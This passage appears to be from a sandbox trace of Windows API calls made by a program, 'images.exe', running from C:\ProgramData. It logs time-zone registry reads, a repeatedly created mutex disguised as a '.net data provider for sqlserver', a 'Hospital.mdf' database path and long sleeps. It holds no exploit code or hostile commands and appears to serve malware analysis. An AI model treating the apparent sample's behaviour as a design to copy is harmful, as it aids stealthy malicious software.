lpcbData=0x47d288*=0x0 | out: lpType=0x47d28c*=0x3, lpData=0x0, lpcbData=0x47d288*=0x2c) returned 0x0 [0080.016] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x47d28c, lpData=0x2235f08, lpcbData=0x47d288*=0x2c | out: lpType=0x47d28c*=0x3, lpData=0x2235f08*, lpcbData=0x47d288*=0x2c) returned 0x0 [0080.016] RegCloseKey (hKey=0x2d0) returned 0x0 [0080.017] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x47d410, lpData=0x0, lpcbData=0x47d40c*=0x0 | out: lpType=0x47d410*=0x1, lpData=0x0, lpcbData=0x47d40c*=0x20) returned 0x0 [0080.017] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x47d410, lpData=0x2236050, lpcbData=0x47d40c*=0x20 | out: lpType=0x47d410*=0x1, lpData="@tzres.dll,-670", lpcbData=0x47d40c*=0x20) returned 0x0 [0080.017] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x47d410, lpData=0x0, lpcbData=0x47d40c*=0x0 | out: lpType=0x47d410*=0x1, lpData=0x0, lpcbData=0x47d40c*=0x20) returned 0x0 [0080.017] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x47d410, lpData=0x22360a8, lpcbData=0x47d40c*=0x20 | out: lpType=0x47d410*=0x1, lpData="@tzres.dll,-672", lpcbData=0x47d40c*=0x20) returned 0x0 [0080.017] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x47d410, lpData=0x0, lpcbData=0x47d40c*=0x0 | out: lpType=0x47d410*=0x1, lpData=0x0, lpcbData=0x47d40c*=0x20) returned 0x0 [0080.017] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x47d410, lpData=0x2236100, lpcbData=0x47d40c*=0x20 | out: lpType=0x47d410*=0x1, lpData="@tzres.dll,-671", lpcbData=0x47d40c*=0x20) returned 0x0 [0080.019] CoTaskMemAlloc (cb=0x20c) returned 0x8f2b70 [0080.019] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x8f2b70 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0080.020] CoTaskMemFree (pv=0x8f2b70) [0080.020] CoTaskMemAlloc (cb=0x20c) returned 0x8f2b70 [0080.020] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x47d42c, pwszFileMUIPath=0x8f2b70, pcchFileMUIPath=0x47d430, pululEnumerator=0x47d424 | out: pwszLanguage=0x0, pcchLanguage=0x47d42c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x47d430, pululEnumerator=0x47d424) returned 1 [0080.021] CoTaskMemFree (pv=0x0) [0080.021] CoTaskMemFree (pv=0x8f2b70) [0080.021] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x550001 [0080.022] CoTaskMemAlloc (cb=0x3ec) returned 0x8f73e0 [0080.023] LoadStringW (in: hInstance=0x550001, uID=0x29e, lpBuffer=0x8f73e0, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0080.023] CoTaskMemFree (pv=0x8f73e0) [0080.023] FreeLibrary (hLibModule=0x550001) returned 1 [0080.023] CoTaskMemAlloc (cb=0x20c) returned 0x8f2b70 [0080.023] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x8f2b70 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0080.024] CoTaskMemFree (pv=0x8f2b70) [0080.024] CoTaskMemAlloc (cb=0x20c) returned 0x8f2b70 [0080.024] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x47d42c, pwszFileMUIPath=0x8f2b70, pcchFileMUIPath=0x47d430, pululEnumerator=0x47d424 | out: pwszLanguage=0x0, pcchLanguage=0x47d42c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x47d430, pululEnumerator=0x47d424) returned 1 [0080.024] CoTaskMemFree (pv=0x0) [0080.024] CoTaskMemFree (pv=0x8f2b70) [0080.024] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x550001 [0080.025] CoTaskMemAlloc (cb=0x3ec) returned 0x8f73e0 [0080.025] LoadStringW (in: hInstance=0x550001, uID=0x2a0, lpBuffer=0x8f73e0, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0080.025] CoTaskMemFree (pv=0x8f73e0) [0080.025] FreeLibrary (hLibModule=0x550001) returned 1 [0080.036] CoTaskMemAlloc (cb=0x20c) returned 0x8f2b70 [0080.036] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x8f2b70 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0080.036] CoTaskMemFree (pv=0x8f2b70) [0080.036] CoTaskMemAlloc (cb=0x20c) returned 0x8f2b70 [0080.036] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x47d42c, pwszFileMUIPath=0x8f2b70, pcchFileMUIPath=0x47d430, pululEnumerator=0x47d424 | out: pwszLanguage=0x0, pcchLanguage=0x47d42c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x47d430, pululEnumerator=0x47d424) returned 1 [0080.037] CoTaskMemFree (pv=0x0) [0080.037] CoTaskMemFree (pv=0x8f2b70) [0080.037] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x550001 [0080.038] CoTaskMemAlloc (cb=0x3ec) returned 0x8f73e0 [0080.038] LoadStringW (in: hInstance=0x550001, uID=0x29f, lpBuffer=0x8f73e0, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0080.038] CoTaskMemFree (pv=0x8f73e0) [0080.038] FreeLibrary (hLibModule=0x550001) returned 1 [0080.039] RegCloseKey (hKey=0x2cc) returned 0x0 [0080.040] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.040] CloseHandle (hObject=0x2c4) returned 1 [0080.040] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2239c90, cbSid=0x47d6f8 | out: pSid=0x2239c90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.040] CreateMutexW (lpMutexAttributes=0x2239d6c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.041] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.041] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.041] CloseHandle (hObject=0x2c4) returned 1 [0080.042] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x223a4ac, cbSid=0x47d6f8 | out: pSid=0x223a4ac*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.042] CreateMutexW (lpMutexAttributes=0x223a588, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.042] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.043] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.043] CloseHandle (hObject=0x2c4) returned 1 [0080.043] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x223acdc, cbSid=0x47d6f8 | out: pSid=0x223acdc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.043] CreateMutexW (lpMutexAttributes=0x223adb8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.043] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.044] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.044] CloseHandle (hObject=0x2c4) returned 1 [0080.044] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x223b510, cbSid=0x47d6f8 | out: pSid=0x223b510*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.044] CreateMutexW (lpMutexAttributes=0x223b5ec, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.044] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.045] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.045] CloseHandle (hObject=0x2c4) returned 1 [0080.045] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x223bd34, cbSid=0x47d6f8 | out: pSid=0x223bd34*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.045] CreateMutexW (lpMutexAttributes=0x223be10, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.045] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.046] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.046] CloseHandle (hObject=0x2c4) returned 1 [0080.046] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x223c55c, cbSid=0x47d6f8 | out: pSid=0x223c55c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.046] CreateMutexW (lpMutexAttributes=0x223c638, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.047] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.047] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.047] CloseHandle (hObject=0x2c4) returned 1 [0080.047] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x223cd78, cbSid=0x47d6f8 | out: pSid=0x223cd78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.047] CreateMutexW (lpMutexAttributes=0x223ce54, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.048] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.048] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.048] CloseHandle (hObject=0x2c4) returned 1 [0080.049] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x223d59c, cbSid=0x47d6f8 | out: pSid=0x223d59c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.049] CreateMutexW (lpMutexAttributes=0x223d678, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.049] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.049] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.049] CloseHandle (hObject=0x2c4) returned 1 [0080.059] GetCurrentProcess () returned 0xffffffff [0080.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47d3f4 | out: TokenHandle=0x47d3f4*=0x2c4) returned 1 [0080.118] GetCurrentProcess () returned 0xffffffff [0080.119] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47d404 | out: TokenHandle=0x47d404*=0x2cc) returned 1 [0080.134] EtwEventRegister () returned 0x0 [0080.181] GetModuleHandleW (lpModuleName=0x0) returned 0x270000 [0080.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="_______SQL______Process______Available@0", cchWideChar=40, lpMultiByteStr=0x47e44c, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x47e408 | out: lpMultiByteStr="_______SQL______Process______Available@0,SRpD\x02Xî\x94®sdæG", lpUsedDefaultChar=0x47e408) returned 40 [0080.181] GetProcAddress (hModule=0x270000, lpProcName="_______SQL______Process______Available@0") returned 0x0 [0080.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="______SQL______Process______Available", cchWideChar=37, lpMultiByteStr=0x47e450, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x47e40c | out: lpMultiByteStr="______SQL______Process______AvailableSRpD\x02Xî\x94®sdæG", lpUsedDefaultChar=0x47e40c) returned 37 [0080.182] GetProcAddress (hModule=0x270000, lpProcName="______SQL______Process______Available") returned 0x0 [0080.185] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\MSSQLServer\\Client\\SuperSocketNetLib", ulOptions=0x0, samDesired=0x20019, phkResult=0x47eb38 | out: phkResult=0x47eb38*=0x0) returned 0x2 [0080.186] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x105, lpBuffer=0x47e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x0) returned 0xf [0080.188] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Hospital.mdf", nBufferLength=0x105, lpBuffer=0x47e684, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Hospital.mdf", lpFilePart=0x0) returned 0x1b [0080.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MSSQLServer\\Client\\ConnectTo", ulOptions=0x0, samDesired=0x20019, phkResult=0x47eb18 | out: phkResult=0x47eb18*=0x0) returned 0x2 [0080.226] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\MSSQLServer\\Client\\SuperSocketNetLib", ulOptions=0x0, samDesired=0x20019, phkResult=0x47eab4 | out: phkResult=0x47eab4*=0x0) returned 0x2 [0080.251] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0080.254] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x744e0000 [0080.329] AdjustWindowRectEx (in: lpRect=0x47ee30, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x47ee30) returned 1 [0080.330] GetCurrentProcess () returned 0xffffffff [0080.331] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x47ed48, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x47ed48*=0x304) returned 1 [0080.343] GetCurrentActCtx (in: lphActCtx=0x47eca8 | out: lphActCtx=0x47eca8*=0x0) returned 1 [0080.343] ActivateActCtx (in: hActCtx=0x8a041c, lpCookie=0x47ecb8 | out: hActCtx=0x8a041c, lpCookie=0x47ecb8) returned 1 [0080.343] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0080.345] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6ff50000 [0080.354] GetModuleHandleW (lpModuleName="user32.dll") returned 0x77130000 [0080.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x47eb70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWäqD\x02Xî\x94®s(ðG", lpUsedDefaultChar=0x0) returned 14 [0080.354] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0080.355] GetStockObject (i=5) returned 0x1900015 [0080.356] GetModuleHandleW (lpModuleName=0x0) returned 0x270000 [0080.358] CoTaskMemAlloc (cb=0x5a) returned 0x8a1a38 [0080.358] RegisterClassW (lpWndClass=0x47eb60) returned 0xc121 [0080.359] CoTaskMemFree (pv=0x8a1a38) [0080.359] GetModuleHandleW (lpModuleName=0x0) returned 0x270000 [0080.359] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.3917f2_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x270000, lpParam=0x0) returned 0x7011a [0080.360] SetWindowLongW (hWnd=0x7011a, nIndex=-4, dwNewLong=2009540061) returned 6031510 [0080.360] GetWindowLongW (hWnd=0x7011a, nIndex=-4) returned 2009540061 [0080.362] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x47e470 | out: phkResult=0x47e470*=0x318) returned 0x0 [0080.362] RegQueryValueExW (in: hKey=0x318, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x47e490, lpData=0x0, lpcbData=0x47e48c*=0x0 | out: lpType=0x47e490*=0x0, lpData=0x0, lpcbData=0x47e48c*=0x0) returned 0x2 [0080.362] RegQueryValueExW (in: hKey=0x318, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x47e490, lpData=0x0, lpcbData=0x47e48c*=0x0 | out: lpType=0x47e490*=0x0, lpData=0x0, lpcbData=0x47e48c*=0x0) returned 0x2 [0080.362] RegCloseKey (hKey=0x318) returned 0x0 [0080.363] SetWindowLongW (hWnd=0x7011a, nIndex=-4, dwNewLong=6031550) returned 2009540061 [0080.363] GetWindowLongW (hWnd=0x7011a, nIndex=-4) returned 6031550 [0080.363] GetWindowLongW (hWnd=0x7011a, nIndex=-16) returned 113311744 [0080.364] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc122 [0080.365] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc164 [0080.365] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x7011a, Msg=0x81, wParam=0x0, lParam=0x47e73c) returned 0x1 [0080.365] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x7011a, Msg=0x83, wParam=0x0, lParam=0x47e728) returned 0x0 [0080.365] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x7011a, Msg=0x1, wParam=0x0, lParam=0x47e73c) returned 0x0 [0080.366] GetClientRect (in: hWnd=0x7011a, lpRect=0x47e4a4 | out: lpRect=0x47e4a4) returned 1 [0080.366] GetWindowRect (in: hWnd=0x7011a, lpRect=0x47e4a4 | out: lpRect=0x47e4a4) returned 1 [0080.367] GetParent (hWnd=0x7011a) returned 0x0 [0080.367] DeactivateActCtx (dwFlags=0x0, ulCookie=0x14820001) returned 1 [0080.596] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x744e0000 [0080.596] AdjustWindowRectEx (in: lpRect=0x47ec8c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x47ec8c) returned 1 [0080.599] GetSystemDefaultLCID () returned 0x409 [0080.599] GetStockObject (i=17) returned 0x18a0025 [0080.601] GetObjectW (in: h=0x18a0025, c=92, pv=0x47ea48 | out: pv=0x47ea48) returned 92 [0080.602] GetDC (hWnd=0x0) returned 0xf0109d4 [0080.627] GdiplusStartup (in: token=0x166030, input=0x47e018, output=0x47e068 | out: token=0x166030, output=0x47e068) returned 0x0 [0080.637] CoTaskMemAlloc (cb=0x5c) returned 0x8a1aa0 [0080.637] GdipCreateFontFromLogfontW (hdc=0xf0109d4, logfont=0x8a1aa0, font=0x47eb10) returned 0x0 [0080.741] CoTaskMemFree (pv=0x8a1aa0) [0080.742] CoTaskMemAlloc (cb=0x5c) returned 0x8a1aa0 [0080.742] CoTaskMemFree (pv=0x8a1aa0) [0080.742] CoTaskMemAlloc (cb=0x5c) returned 0x8a1aa0 [0080.742] CoTaskMemFree (pv=0x8a1aa0) [0080.742] GdipGetFontUnit (font=0x53d2230, unit=0x47eadc) returned 0x0 [0080.743] GdipGetFontSize (font=0x53d2230, size=0x47eae0) returned 0x0 [0080.743] GdipGetFontStyle (font=0x53d2230, style=0x47ead8) returned 0x0 [0080.743] GdipGetFamily (font=0x53d2230, family=0x47ead4) returned 0x0 [0080.743] GdipGetFontSize (font=0x53d2230, size=0x22479b8) returned 0x0 [0080.744] ReleaseDC (hWnd=0x0, hDC=0xf0109d4) returned 1 [0080.744] GetDC (hWnd=0x0) returned 0xf0109d4 [0080.744] GdipCreateFromHDC (hdc=0xf0109d4, graphics=0x47eafc) returned 0x0 [0080.745] GdipGetDpiY (graphics=0x527fcf0, dpi=0x2247ac0) returned 0x0 [0080.746] GdipGetFontHeight (font=0x53d2230, graphics=0x527fcf0, height=0x47eaf4) returned 0x0 [0080.746] GdipGetEmHeight (family=0x53df6b8, style=0, EmHeight=0x47eafc) returned 0x0 [0080.746] GdipGetLineSpacing (family=0x53df6b8, style=0, LineSpacing=0x47eafc) returned 0x0 [0080.746] GdipDeleteGraphics (graphics=0x527fcf0) returned 0x0 [0080.746] ReleaseDC (hWnd=0x0, hDC=0xf0109d4) returned 1 [0080.747] GdipCreateFont (fontFamily=0x53df6b8, emSize=0x41040000, style=0, unit=0x3, font=0x2247a80) returned 0x0 [0080.747] GdipGetFontSize (font=0x52d2940, size=0x2247a84) returned 0x0 [0080.747] GdipDeleteFont (font=0x53d2230) returned 0x0 [0080.747] GetDC (hWnd=0x0) returned 0xf0109d4 [0080.747] GdipCreateFromHDC (hdc=0xf0109d4, graphics=0x47eb60) returned 0x0 [0080.747] GdipGetFontHeight (font=0x52d2940, graphics=0x527fcf0, height=0x47eb58) returned 0x0 [0080.747] GdipDeleteGraphics (graphics=0x527fcf0) returned 0x0 [0080.747] ReleaseDC (hWnd=0x0, hDC=0xf0109d4) returned 1 [0080.748] GetSystemMetrics (nIndex=5) returned 1 [0080.748] GetSystemMetrics (nIndex=6) returned 1 [0080.748] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x744e0000 [0080.749] AdjustWindowRectEx (in: lpRect=0x47ec88, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x47ec88) returned 1 [0080.749] GetDC (hWnd=0x0) returned 0xf0109d4 [0080.749] GdipCreateFromHDC (hdc=0xf0109d4, graphics=0x47eb60) returned 0x0 [0080.749] GdipGetFontHeight (font=0x52d2940, graphics=0x527fcf0, height=0x47eb58) returned 0x0 [0080.749] GdipDeleteGraphics (graphics=0x527fcf0) returned 0x0 [0080.749] ReleaseDC (hWnd=0x0, hDC=0xf0109d4) returned 1 [0080.749] GetSystemMetrics (nIndex=5) returned 1 [0080.749] GetSystemMetrics (nIndex=6) returned 1 [0080.750] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x744e0000 [0080.750] AdjustWindowRectEx (in: lpRect=0x47ec88, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x47ec88) returned 1 [0080.750] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x744e0000 [0080.750] AdjustWindowRectEx (in: lpRect=0x47ec8c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x47ec8c) returned 1 [0080.750] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x744e0000 [0080.750] AdjustWindowRectEx (in: lpRect=0x47ec8c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x47ec8c) returned 1 [0080.751] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x744e0000 [0080.751] AdjustWindowRectEx (in: lpRect=0x47ec88, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x47ec88) returned 1 [0080.751] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x744e0000 [0080.751] AdjustWindowRectEx (in: lpRect=0x47ec88, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x47ec88) returned 1 [0080.763] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x47e54c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0080.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x47e9e0) returned 1 [0080.763] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x47ea5c | out: lpFileInformation=0x47ea5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0080.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x47e9dc) returned 1 [0081.126] SleepEx (dwMilliseconds=0xa21c, bAlertable=1) Thread: id = 26 os_tid = 0x904 Thread: id = 27 os_tid = 0x914 [0078.542] CoGetContextToken (in: pToken=0x42ef53c | out: pToken=0x42ef53c) returned 0x800401f0 [0078.542] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 28 os_tid = 0x924 Thread: id = 29 os_tid = 0x9ac [0080.213] CoGetContextToken (in: pToken=0x50cf80c | out: pToken=0x50cf80c) returned 0x0 [0080.213] CObjectContext::QueryInterface () returned 0x0 [0080.213] CObjectContext::GetCurrentThreadType () returned 0x0 [0080.213] Release () returned 0x0 [0080.213] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0080.213] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) returned 0xc0 [0080.213] SleepEx (dwMilliseconds=0x3a980, bAlertable=1) returned 0x0 [0090.343] SleepEx (dwMilliseconds=0x38261, bAlertable=1) Thread: id = 30 os_tid = 0xac0 Process: id = "7" image_name = "images.exe" filename = "c:\\programdata\\images.exe" page_root = "0x77841000" os_pid = "0x530" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "modified_file" parent_id = "5" os_parent_pid = "0x4c8" cmd_line = "\"C:\\ProgramData\\images.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0x534 [0150.157] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0151.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x33e85c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0151.200] IsAppThemed () returned 0x1 [0151.204] CoTaskMemAlloc (cb=0xf0) returned 0x780c90 [0151.204] CreateActCtxA (pActCtx=0x33ed58) returned 0x77396c [0151.295] CoTaskMemFree (pv=0x780c90) [0151.309] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0151.309] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc11f [0154.870] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x33e6fc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0154.870] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x33e6a8, lpFilePart=0x0 | out: 